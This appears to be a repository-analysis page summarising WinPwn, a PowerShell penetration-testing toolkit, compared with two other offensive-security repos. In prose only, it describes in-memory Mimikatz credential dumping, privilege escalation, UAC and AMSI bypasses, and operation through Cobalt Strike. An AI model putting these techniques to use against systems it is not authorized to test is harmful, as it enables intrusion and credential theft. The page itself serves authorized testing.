Analysis updated 2026-07-03
Run automated local and Active Directory reconnaissance on a Windows network during an authorized penetration test.
Dump credentials from memory using Mimikatz without dropping a file to disk on the target host.
Check a Windows domain for privilege escalation paths and known CVEs across OS versions from XP through Server 2019.
Run the toolkit non-interactively through a Cobalt Strike or Covenant command-and-control framework.
| s3cur3th1ssh1t/winpwn | 0xsyr0/oscp | mantvydasb/redteaming-tactics-and-techniques | |
|---|---|---|---|
| Stars | 3,664 | 3,728 | 4,590 |
| Language | PowerShell | PowerShell | PowerShell |
| Setup difficulty | moderate | easy | hard |
| Complexity | 4/5 | 1/5 | 4/5 |
| Audience | ops devops | ops devops | developer |
Figures from each repo's GitHub metadata at analysis time.
Requires bypassing Windows Defender AMSI on most modern Windows systems before the script can be imported, the README covers this.
WinPwn is a PowerShell script that automates common tasks used during internal penetration tests of Windows environments and Active Directory networks. The author built it after repeatedly running the same individual security scripts one after another during engagements, and wanting a single tool that handled proxy detection automatically, since many corporate networks require a proxy to reach the internet. The script wraps a large number of well-known offensive security tools and techniques into menu-driven functions. The main categories are: local reconnaissance (collecting installed software, network configuration, group memberships, and searching for passwords stored in the registry or file system), domain reconnaissance (mapping out an Active Directory environment, finding misconfigurations, generating BloodHound reports, checking for known vulnerabilities across domain systems), privilege escalation (checking for weak permissions, kernel exploits for specific CVEs across Windows versions from XP through Server 2019), credential dumping (running Mimikatz in memory to extract passwords and hashes, dumping browser credentials, extracting saved Wi-Fi passwords), and User Account Control bypasses. The tool can run interactively with menus for selecting options, or with -noninteractive and -consoleoutput flags so that it works from a command-and-control framework like Cobalt Strike or Covenant without requiring user interaction. An offline version bundles the most important scripts and executables for environments with no internet access. It is imported by running a single PowerShell command. The README notes that Windows Defender's AMSI (a script scanning system) may block the import and provides guidance on using published bypass techniques to work around that. The tool is intended for use by professional penetration testers and security researchers against systems they are authorized to test.
A PowerShell toolkit that automates common Windows and Active Directory penetration testing tasks, reconnaissance, privilege escalation, and credential dumping, in a single menu-driven script with automatic proxy detection.
Mainly PowerShell. The stack also includes PowerShell, Mimikatz, BloodHound.
Setup difficulty is rated moderate, with roughly 30min to a first successful run.
Mainly ops devops.
This repo across BitVibe Labs
Verify against the repo before relying on details.